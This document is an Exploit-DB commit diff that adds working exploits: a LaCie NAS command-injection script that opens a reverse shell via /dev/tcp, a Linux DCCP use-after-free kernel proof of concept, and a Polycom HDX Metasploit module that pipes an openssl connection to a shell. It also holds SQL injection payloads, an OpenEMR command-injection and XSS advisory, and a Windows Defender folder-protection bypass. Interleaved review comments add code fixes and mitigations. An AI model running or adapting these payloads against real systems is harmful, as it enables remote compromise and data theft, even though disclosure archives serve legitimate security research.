DB: 2017-12-08

9 changes to exploits/shellcodes

Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path
Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash
Linux Kernel - DCCP Socket Use-After-Free
LaCie 5big Network 2.2.8 - Command Injection
Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)
Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal
FS IMDB Clone - 'id' SQL Injection
FS Facebook Clone - 'token' SQL Injection
OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting
Offensive Security 2017-12-08 05:02:13 +00:00
parent 08d2346400
commit b546191ef2
10 changed files with 1017 additions and 0 deletions

96
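--- a/exploits/cgi/remote/43226.py
+++ b/exploits/cgi/remote/43226.py
@@ -0,0 +1,96 @@
+#!/usr/bin/python
+# Exploit Title: LaCie 5big Network 2.2.8 Command Injection
+# Date: 2017-12-04
+# Exploit Author: Timo Sablowski
+# Contact: ${lastname}@tyntec.com
+# Vendor Homepage: http://www.lacie.com
+# Software Link: http://www.lacie.com/files/lacie-content/download/drivers/5%20Big%20Network.zip
+# Version: 2.2.8
+# Tested on: Linux
+# Platform: Hardware
+#
+# Command Injection Vulnerability (with root privileges) in LaCie's
+# 5big Network appliance running firmware version 2.2.8.
+# Just open a netcat listener and run this script to receive a reverse
+# shell to exploit the vulnerability.
+#
+# This exploit has been released to Seagate in accordance to their
+# responsible disclosure program and is meant to be used for testing
+# and educational purposes only.
+# Please do not use it against any system without prior permission.
+# Use at your own risk.
+#
+# Timeline:
+# 2017-09-13: Discovery
+# 2017-10-04: Reporting to Seagate
+# asking to fix the issue until 2017-12-04
+# 2017-11-07: Seagate stating to not fix the vulnerability as the
+# product has been EOL for a long time
+import sys, getopt, os, urllib
+url_addition = "/cgi-bin/public/edconfd.cgi?method=getChallenge&login="
+blank_payload = "admin|#' ||`/bin/sh -i > /dev/tcp/IP/PORT 0<&1 2>&1` #\\\""
+def help():
+print "Usage:"
+print "%s -u <baseurl> -l <listener> -p <port>" %os.path.basename(sys.argv[0])
+print ""
+print "<baseurl> identifies the target's URL, e.g. http://10.0.0.1:8080"
+print "<listener> sets the IP where the attacked system connects back to"
+print "<port> defines the listening port"
+print ""
+print "Example: attack LaCie system to connect back to a remote machine (do not forget to open a netcat session)"
+print "\t %s -u http://10.0.0.1 -l 192.168.0.1 -p 4444" %os.path.basename(sys.argv[0])
+def create_payload(blank_payload, listener, port):
+print "[+] Generating payload with IP %s and port %s" %(listener, str(port))
+payload = blank_payload.replace("IP", listener).replace("PORT", str(port))
+payload = urllib.quote(payload, safe='')
+return payload
+def send_payload(injected_url):
+print "[+] Sending payload, this might take a few seconds ..."
+print "[+] Check your listener"
+try:
+urllib.urlopen(injected_url)
+except:
+raise
+def main():
+try:
+opts, args = getopt.getopt(sys.argv[1:],"hu:l:p:")
+except:
+help()
+sys.exit(1)
+for opt, arg in opts:
+if opt == '-h':
+help()
+sys.exit()
+elif opt in ("-u"):
+url = arg
+elif opt in ("-l"):
+listener = arg
+elif opt in ("-p"):
+port = int(arg)
+try:
+url
+listener
+port
+except:
+help()
+sys.exit(1)
+payload = create_payload(blank_payload, listener, port)
+injected_url = "%s%s%s" %(url, url_addition, payload)
+send_payload(injected_url)
+if __name__ == "__main__":
+main()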
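Review bot: The presence check that follows the option loop in main (`try: url` / `listener` / `port` / `except:`) only works because a bare `except:` happens to catch NameError, which also hides any other failure and leaves the intent unreadable; initialise `url = listener = port = None` before the loop and test `if None in (url, listener, port): help(); sys.exit(1)`. The `try`/`except: raise` around `urllib.urlopen` in send_payload is a no-op and can go, and `int(arg)` for `-p` raises an uncaught ValueError on non-numeric input. The script is Python 2 only (`print` statements, `urllib.quote`/`urllib.urlopen`), which the header should state next to "Tested on". From the defender's side the header records that Seagate declined to fix because the product is EOL, so the only mitigations are keeping the appliance's web management path (`/cgi-bin/public/edconfd.cgi`) off untrusted networks or retiring the device, and a request to that CGI whose `login` value contains shell metacharacters is a usable detection signature.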

146
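--- a/exploits/linux/dos/43234.c
+++ b/exploits/linux/dos/43234.c
@@ -0,0 +1,146 @@
+/*
+This is an announcement for CVE-2017-8824 which is a use-after-free
+vulnerability
+I found in Linux DCCP socket. It can be used to gain kernel code execution
+from unprivileged processes.
+Youll find in attachment the proof of concept code and the kernel panic
+log.
+####### BUG DETAILS ############
+When a socket sock object is in DCCP_LISTEN state and connect() system
+call is being called with AF_UNSPEC,
+the dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free
+dccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,
+then when we call connect() again with AF_INET6 sockaddr family, the sock
+object gets cloned via dccp_create_openreq_child() and returns a new sock
+object,
+which holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old
+sock object, and this leads to both the old and new sock objects can use
+the same memory.
+####### LINKS ############
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824
+http://lists.openwall.net/netdev/2017/12/04/224
+####### CREDITS ############
+Mohamed Ghannam
+*/
+/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions
+* if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object
+* */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <sys/mman.h>
+int fd1,fd2;
+struct sockaddr_in6 in1,in2;
+int do_uaf()
+{
+struct sockaddr_in6 cin1,cin2;
+fd1 = socket(0xa,6,0);
+memset(&in1,0,sizeof(in1));
+in1.sin6_family = AF_INET6;
+in1.sin6_addr = in6addr_loopback;
+in1.sin6_port = 0x214e;//htons(0x1000);
+bind(fd1,(struct sockaddr*)&in1,sizeof(in1));
+listen(fd1,0x1);
+fd2 = socket(0xa,6,0);
+memset(&cin1,0,sizeof(cin1));
+cin1.sin6_family = AF_INET6;
+cin1.sin6_addr = in6addr_loopback;
+cin1.sin6_port = 0x214e;//htons(0x1000);
+cin1.sin6_flowinfo = 0;
+connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));
+memset(&cin2,0,sizeof(cin2));
+connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));
+memset(&in2,0,sizeof(in2));
+in2.sin6_family = AF_INET6;
+in2.sin6_addr = in6addr_loopback;
+in2.sin6_port = htons(0x2000);
+in2.sin6_flowinfo = 0x2;
+in2.sin6_scope_id = 6;
+bind(fd2,(struct sockaddr*)&in2,sizeof(in2));
+struct sockaddr_in6 cin3;
+memset(&cin3,0,sizeof(cin3));
+connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));
+listen(fd2,0xb1);
+struct sockaddr_in6 cin4;
+memset(&cin4,0,sizeof(cin4));
+cin4.sin6_family = AF_INET6;
+cin4.sin6_port = htons(0x2000);//htons(0x3000);
+memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));
+cin4.sin6_flowinfo = 1;
+cin4.sin6_scope_id = 0x32f1;
+connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));
+return fd2;
+}
+void * alloc_umem(void *addr,size_t size)
+{
+addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);
+if(addr == (char *)-1) {
+perror("mmap");
+return NULL;
+}
+return addr;
+}
+int main(void)
+{
+char *addr;
+addr = (char *)alloc_umem((void*)0x100000000,4096);
+if(addr == NULL)
+exit(0);
+memset(addr,0xcc,4096);
+*(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */
+do_uaf();
+socket(AF_INET,SOCK_STREAM,0);
+close(fd2);
+return 0;
+}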
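Review bot: None of the socket()/bind()/listen()/connect() return values in do_uaf are checked, so on a kernel where DCCP is unavailable (or where the hard-coded port is already bound) the PoC runs to a clean exit and a "did not crash" result means nothing; at minimum add `if (fd1 < 0) { perror("socket"); return -1; }` after each socket() call and make main honour the return value. alloc_umem ignores both of its parameters (`addr` is immediately overwritten, `size` is unused) and compares the result with `(char *)-1` rather than `MAP_FAILED`; either pass `addr` and `size` through to mmap or drop the parameters. The header comment already warns that missing RIP control only means a different object landed in the freed slot, and that caveat belongs next to the `do_uaf()` call in main so a reader does not treat a silent run as "not vulnerable". For defenders, the trigger needs the dccp module to be loadable by an unprivileged process, so on hosts that do not use DCCP a modprobe blacklist (`install dccp /bin/false`) plus alerting on dccp module loads is the practical compensating control until the kernel fix for CVE-2017-8824 is deployed.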


@ -0,0 +1,28 @@
Summary
Name: CIP Safety dissector crash
Docid: wnpa-sec-2017-49
Date: November 30, 2017
Affected versions: 2.4.0 to 2.4.2, 2.2.0 to 2.2.10
Fixed versions: 2.4.3, 2.2.11
References:
Wireshark bug 14250
Details
Description
The CIP Safety dissector could crash.
Impact
It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.
Resolution
Upgrade to Wireshark 2.4.3, 2.2.11 or later.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43233.zip


@ -0,0 +1,32 @@
# Exploit Title: FS IMDB Clone - 'id' SQL Injection
# Date: 2017-12-06
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/imdb-clone/
# Version: 2017-12-06
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = id
http://localhost/show_misc_video.php?id=1
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7861=7861
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: id=1 AND (SELECT 2902 FROM(SELECT
COUNT(*),CONCAT(0x71766b6271,(SELECT
(ELT(2902=2902,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5831 UNION ALL SELECT
NULL,CONCAT(0x71766b6271,0x454e4e656f6a7a4676744c594479535a49667041726266686f6d6b46774d67425a7a4e5857617065,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL--
WuUS
---


@ -0,0 +1,29 @@
# Exploit Title: FS Facebook Clone - 'token' SQL Injection
# Date: 2017-12-06
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/facebook-clone/
# Version: 2017-12-06
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = token
http://localhost/group.php?token=
---
Parameter: token (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=6595c4ca4238a0b923820dcc509a6f75849b' AND 8810=8810--
IYhZ
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=6595c4ca4238a0b923820dcc509a6f75849b' AND SLEEP(5)-- Eljm
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: token=-8316' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178767171,0x546d597a6367557a70475a5042514e77654249574c766772746e7a557579724267574a6d59544368,0x71766a6a71),NULL,NULL,NULL,NULL,NULL--
sphZ
---


@ -0,0 +1,185 @@
SEC Consult Vulnerability Lab Security Advisory < 20171130-1 >
=======================================================================
title: OS Command Injection & Reflected Cross Site Scripting
product: OpenEMR
vulnerable version: 5.0.0
fixed version: 5.0.0 Patch 2 or higher
CVE number: -
impact: Critical
homepage: http://www.open-emr.org/
found: 2017-03-03
by: Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"OpenEMR is the most popular open source electronic health records and medical
practice management solution. ONC certified with international usage,
OpenEMR's goal is a superior alternative to its proprietary counterparts."
Source: http://www.open-emr.org/
Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker can
fully compromise the web server which has OpenEMR installed. Potentially
sensitive health care and medical data might get exposed through this attack.
SEC Consult recommends not to attach OpenEMR to the network until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1. OS Command Injection
Any OS commands can be injected by an authenticated attacker with any role.
This is a serious vulnerability as the chance for the system to be fully
compromised is very high.
2. Reflected Cross Site Scripting
This vulnerability allows an attacker to inject malicious client side
scripting which will be executed in the browser of users if they visit the
manipulated site. There are different issues affecting various components.
The flash component has not been fixed yet as OpenEMR is looking for a
replacement component.
Proof of concept:
-----------------
1. OS Command Injection
Below is the detail of a HTTP request that needs to be sent to execute arbitrary
OS commands through "fax_dispatch.php".
URL : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=x
METHOD : POST
PAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_
filename='||<os-commands-here>||'&form_pid=1
2. Reflected Cross Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross site scripting:
The following payload shows a simple alert message box:
a)
URL : http://$DOMAIN/library/openflashchart/open-flash-chart.swf
METHOD : GET
PAYLOAD : [PoC removed as no fix is available]
b)
URL :
http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.php
METHOD : POST
PAYLOAD : <script>alert('xss');</script>=SENDF
Vulnerable / tested versions:
-----------------------------
OpenEMR version 5.0.0 has been tested. This version was the latest
at the time the security vulnerability was discovered.
Vendor contact timeline:
------------------------
2017-03-08: Contacting vendor through email.
2017-03-08: Vendor replied with his public key. Advisory sent through secure
channel.
2017-03-17: Asked for a status update from the vendor.
2017-03-17: Vendor confirms the vulnerabilities and working on the fixes.
2017-03-31: Asked for a status update from the vendor.
2017-03-31: Vendor informed that they have fixed OS Command Injection and are
currently working on fixes for Reflected Cross Site Scripting.
2017-04-25: Vendor requesting extension for deadline of 32 days from the
latest possible release date.
2017-05-25: Asked for a status update from the vendor.
2017-05-29: Vendor informed that they are working on the fixes.
2017-06-06: Asked for a status update from the vendor.
2017-06-12: Vendor informed that they added solution into the development
codebase.
2017-07-05: Asked for a status update from the vendor.
2017-07-10: Vendor informed patch is delayed due to another critical bug
fixes.
2017-08-17: Asked for a status update from the vendor. No reply.
2017-08-24: Asked for a status update from the vendor.
2017-08-29: Vendor informed patch will be out soon.
2017-08-30: Asked vendor for specific release date for patch. No reply.
2017-09-08: Asked for a status update from the vendor. No reply.
2017-09-14: Asked for a status update from the vendor.
2017-09-18: Vendor informed that they are testing their patch. No estimation
yet on the patch release date.
2017-10-17: Asked for a status update from the vendor. No reply.
2017-10-30: Asked for a status update from the vendor.
2017-10-31: Vendor informed that the patch will be released as soon as
possible.
2017-11-15: Asked for a status update from the vendor.
2017-11-21: Vendor informed that they are working on other vulnerabilities
2017-11-30: Public release of SEC Consult advisory.
Solution:
---------
The vendor has fixed the code execution issue and XSS 2b) in GIT in March 2017:
https://github.com/openemr/openemr/commit/ee0945a30dbb17ceee82b9b553d7dcb177710ca8#diff-1fdae02fadfcbc6147352cdc7c63279a
The fix has been incorporated in 5.0.0 Patch 2 or higher.
The XSS example 2a (flash) is not yet fixed.
Because of critical security issues (CVE-2017-16540) of other security
researchers it is highly recommended to upgrade to at least version
5.0.0 Patch 6 immediately.
http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Jasveer Singh / @2017

177
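--- a/exploits/unix/remote/43230.rb
+++ b/exploits/unix/remote/43230.rb
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::Tcp
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Polycom Shell HDX Series Traceroute Command Execution',
+'Description' => %q{
+Within Polycom command shell, a command execution flaw exists in
+lan traceroute, one of the dev commands, which allows for an
+attacker to execute arbitrary payloads with telnet or openssl.
+},
+'Author' => [
+'Mumbai', #
+'staaldraad', # https://twitter.com/_staaldraad/
+'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
+'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
+],
+'References' => [
+['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']
+],
+'DisclosureDate' => 'Nov 12 2017',
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'Targets' => [[ 'Automatic', {} ]],
+'Payload' => {
+'Space' => 8000,
+'DisableNops' => true,
+'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'}
+},
+'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+'DefaultTarget' => 0
+))
+register_options(
+[
+Opt::RHOST(),
+Opt::RPORT(23),
+OptString.new('PASSWORD', [ false, "Password to access console interface if required."]),
+OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
+OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
+])
+end
+def check
+connect
+Rex.sleep(1)
+res = sock.get_once
+disconnect
+if !res && !res.empty?
+return Exploit::CheckCode::Unknown
+elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
+return Exploit::CheckCode::Detected
+end
+Exploit::CheckCode::Unknown
+end
+def exploit
+unless check == Exploit::CheckCode::Detected
+fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
+end
+#
+# Obtain banner information
+#
+sock = connect
+Rex.sleep(2)
+banner = sock.get_once
+vprint_status("Received #{banner.length} bytes from service")
+vprint_line("#{banner}")
+if banner =~ /password/i
+print_status("Authentication enabled on device, authenticating with target...")
+if datastore['PASSWORD'].nil?
+print_error("#{peer} - Please supply a password to authenticate with")
+return
+end
+# couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
+sock.put("#{datastore['PASSWORD']}\n")
+res = sock.get_once
+if res =~ /Polycom/
+print_good("#{peer} - Authenticated successfully with target.")
+elsif res =~ /failed/
+print_error("#{peer} - Invalid credentials for target.")
+return
+end
+elsif banner =~ /Polycom/ # praise jesus
+print_good("#{peer} - Device has no authentication, excellent!")
+end
+do_payload(sock)
+end
+def do_payload(sock)
+# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
+cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
+# Start a listener
+start_listener(true)
+# Figure out the port we picked
+cbport = self.service.getsockname[2]
+cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
+sock.put(cmd)
+if datastore['VERBOSE']
+Rex.sleep(2)
+resp = sock.get_once
+vprint_status("Received #{resp.length} bytes in response")
+vprint_line(resp)
+end
+# Give time for our command to be queued and executed
+1.upto(5) do
+Rex.sleep(1)
+break if session_created?
+end
+end
+def stage_final_payload(cli)
+print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
+cli.put(payload.encoded + "\n")
+end
+def start_listener(ssl = false)
+comm = datastore['ListenerComm']
+if comm == 'local'
+comm = ::Rex::Socket::Comm::Local
+else
+comm = nil
+end
+self.service = Rex::Socket::TcpServer.create(
+'LocalPort' => datastore['CBPORT'],
+'SSL' => ssl,
+'SSLCert' => datastore['SSLCert'],
+'Comm' => comm,
+'Context' =>
+{
+'Msf' => framework,
+'MsfExploit' => self
+}
+)
+self.service.on_client_connect_proc = proc { |client|
+stage_final_payload(client)
+}
+# Start the listening service
+self.service.start
+end
+# Shut down any running services
+def cleanup
+super
+if self.service
+print_status("Shutting down payload stager listener...")
+begin
+self.service.deref if self.service.is_a?(Rex::Service)
+if self.service.is_a?(Rex::Socket)
+self.service.close
+self.service.stop
+end
+self.service = nil
+rescue ::Exception
+end
+end
+end
+# Accessor for our TCP payload stager
+attr_accessor :service
+end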
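Review bot: The guard in `check`, `if !res && !res.empty?`, is inverted: when `sock.get_once` returns nil the first clause is true and `res.empty?` is then called on nil, raising NoMethodError instead of returning Unknown, and for any non-empty string the first clause is false so the branch never fires; it should read `if res.nil? || res.empty?`. The same nil case reaches `banner.length` in `exploit` after the second `get_once` (and `resp.length` in do_payload), so either guard with `banner.to_s` or return early with a `print_error`. `cleanup` rescues `::Exception` and discards it, which also swallows `Interrupt`; narrow it to `::StandardError` or at least `vprint_error` the message so a failed listener shutdown is visible. On the defensive side the module needs only the telnet console on TCP/23 and, as the `print_good` branch in `exploit` shows, works when no password is set, so disabling or firewalling the HDX telnet interface and setting a console password are the mitigations, and an outbound `openssl s_client` connection originating from a video endpoint is a strong detection signal.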


@ -0,0 +1,67 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1418
Windows Defender: Controlled Folder Bypass through UNC Path
Platform: Windows 10 1709 + Antimalware client version 4.12.16299.15
Class: Security Feature Bypass
Summary: You can bypass the controlled folder feature in Defender in Windows 10 1709 using a local UNC admin share.
Description:
It was hard not to just blog about this issue, as its so obvious and you must known about already, but I thought better of it. Im sure it wouldnt help my efforts to mend our fractured relationship :-)
Controlled Folder access seems to be based on a blacklist, which is fine as far as it goes. I didnt bother to dig too deeply but Id assume youre using a filter driver, when you get a hit in the blacklist you reduce the access rights down to a set of read-only rights then return to the caller. This prevents a malicious application deleting or modifying the file because it doesnt have the access rights to do so. Therefore it then becomes a task of finding a way of accessing the protected file which circumvents the blacklist.
The obvious one for me to try was local UNC admin share, which goes over between the SMB client and SMB server drivers. And this works just fine to open the target file for write/delete access and therefore circumvent the controlled folders feature. As in if you want to access c:\protected\file.txt you open \\localhost\c$\protected\file.txt. While you can only do this as an unsandboxed user you wouldnt be able to access the file from a sandbox anyway. I did try a few others just to see such as mount points and hardlinks and those seem to be protected as far as I could tell in my limited efforts.
As I said I didnt look too hard but it would be reasonable to assume as to why this works:
* The actual file is opened in the System process which it likely to be trusted
* The path the filter driver actually sees is the UNC path which isnt in the blacklist.
You can fix this by adding the UNC path to the list of protected folders, however youve got so many ways of bypassing it. For example if you block \\localhost\c$\... you can bypass with \\127.0.0.1\c$\... or the real fun one of IPv6 localhost which has many potential representations such as 0::0:0:1 and ::1 etc. You could probably also set up a DNS host which resolves to localhost and just have completely random subdomains. So Im not sure how youd fix it, perhaps thats why it works as it was too hard?
While I understand the rationale for this feature, to leave such a large hole (and then brag about how awesome it is) is a perfect demonstration of the AV fallacy that it blocks everything as long as no one actually tries to bypass the protection. Perhaps some better security testing before shipping it might have been in order as if I can find it so can the Ransomware authors, it wouldnt take them long to adapt, and then youd end up with egg on your face.
Also while its not a security issue it seems if you open a file and request MAXIMUM_ALLOWED youd normally get SYNCHRONIZE access. However when the file is in a controlled location you dont, you only get FILE_GENERIC_READ and SYNCHRONIZE is missing. While you can still get SYNCHRONIZE if you explicitly ask for it (so calling CreateFile should be okay) if youre calling the native API you wont. I could imagine this might break some drivers if they relied on being able to SYNCHRONIZE on a MAXIMUM_ALLOWED handle. Perhaps you can pass this along?
Proof of Concept:
Ive provided a PoC as a C# project. You could easily do this with PowerShell or CMD as they dont seem to be trusted but this proves its not some fluke due to a MS binary.
1) Compile the C# source.
2) Enable Controlled Folder Access option with default configuration.
3) Create a file in a protected location such as the users Desktop folder with an approved application such as explorer.
4) Run the poc passing the local filesystem path, e.g. c:\users\user\desktop\file.txt
5) Run the poc passing a local UNC admin share path e.g. \\localhost\c$\users\user\desktop\file.txt
Expected Result:
Controlled folder access should block both file paths.
Observed Result:
Defender blocks the direct path but doesnt block the one via UNC and the protected file is deleted.
Sent MSRC a note that if they're planning on fixing they should be careful if the fix involves parsing the UNC path out as you could circumvent that using a mount point which wouldn't be reflected in the requested path but would result in opening a arbitrary target file.
Microsoft consider this feature defense in depth (which is certainly is I suppose) and so this is only consider possible fix in vnext. Marking it as WontFix.
*/
using System;
using System.IO;
class MainClass {
static void Main(string[] args) {
if (args.Length < 1) {
Console.WriteLine("Specify file path");
return;
}
try {
File.Delete(args[0]);
Console.WriteLine("Done");
} catch(Exception ex) {
Console.WriteLine(ex.Message);
}
}
}
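Review bot: `File.Delete` does not throw when the path does not exist, so the `Done` message on the success branch does not by itself prove that a protected file was removed; check `File.Exists(args[0])` before and after the call and print the outcome, otherwise a typo in the UNC path reads as a successful bypass. Catching `Exception` is acceptable for a PoC, but printing `ex.GetType().Name` alongside `ex.Message` would let a reader distinguish an access-denied failure (the expected Controlled Folder Access outcome for the direct path) from an ordinary I/O error. The write-up records that Microsoft marked this WontFix as defense in depth, so on affected builds object-access auditing on the protected folders, which also records opens that arrive through the local admin share, is the practical compensating control.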

248
exploits/windows/remote/43231.py Executable file

@ -0,0 +1,248 @@
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# github.com/tintinweb
#
#
# optional: pip install pysocks (https://pypi.python.org/pypi/PySocks)
#
#
'''
API overview:
# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}
Exec:
#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport -3333
Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner v10.0 ║
...
Total cards: 1
ETH - connecting to 192.168.0.1:8545
DUAL MINING MODE ENABLED: ETHEREUM+DECRED
DCR: Stratum - connecting to 'pasc-eu2.nanopool.org' <213.32.29.168> port 15555
ETH: HTTP SOLO mode
Ethereum HTTP requests time (-etht) is set to 200 ms
Watchdog enabled
Remote management (READ-ONLY MODE) is enabled on port 3333
DCR: Stratum - Connected (pasc-eu2.nanopool.org:15555)
DCR: Authorized
DCR: 11/22/17-22:05:12 - New job from pasc-eu2.nanopool.org:15555
... <run poc.py --vector=method <target>>
GPU0 t=57C fan=0%
Remote management: unknown command miner_getstat1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
